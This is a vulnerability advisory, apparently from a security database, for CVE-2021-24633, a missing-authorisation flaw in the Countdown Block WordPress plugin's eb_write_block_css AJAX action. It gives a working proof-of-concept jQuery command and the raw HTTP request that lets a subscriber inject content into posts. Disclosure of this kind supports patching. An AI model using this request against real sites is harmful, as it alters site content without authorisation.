Lucene search
Apple502jWPEX-ID:431901EB-0F95-4033-B943-324E6D3844A5HistoryAug 30, 2021 - 12:00 a.m.
Countdown Block < 1.1.2 - Missing Authorisation in AJAX action
2021-08-3000:00:00
apple502j
418
missing authorisation
ajax action
unauthorized access
security exploit
cross-site scripting
EPSS
0.001
Percentile
24.8%
The plugin does not have authorisation in the eb_write_block_css AJAX action, which allows any authenticated user, such as Subscriber, to modify post contents displayed to users. v1.1.1 attempt to fix the issue was incomplete, still allowing it to be exploited via a CSRF attack on an admin due to a logic flaw.
Login as any user, such as a subscriber, and execute the below command via the Web Developer console (replacing the POST_ID by the post id to add the content to)
jQuery.post(ajaxurl,{action:"eb_write_block_css",id:POST_ID,data:JSON.stringify([{desktop:"p:before{content:'This content was added by a subscriber!';}"}])})
Which will send the following request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 143
Connection: close
Cookie: [any authenticated user]
action=eb_write_block_css&id=1422&data=%5B%7B%22desktop%22%3A%22p%3Abefore%7Bcontent%3A'This+content+was+added+by+a+subscriber!'%3B%7D%22%7D%5D
Then view the related post, which will have the text 'This content was added by a subscriber!' appended before each paragraphRelated
patchstack
patchstack
prion
prion
Design/Logic Flaw
2021-09-27 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2021-24633
2021-09-27 16:15:08
wpvulndb
wpvulndb
Countdown Block < 1.1.2 - Missing Authorisation in AJAX action
2021-08-30 00:00:00
cve
cve
CVE-2021-24633
2021-09-27 16:15:08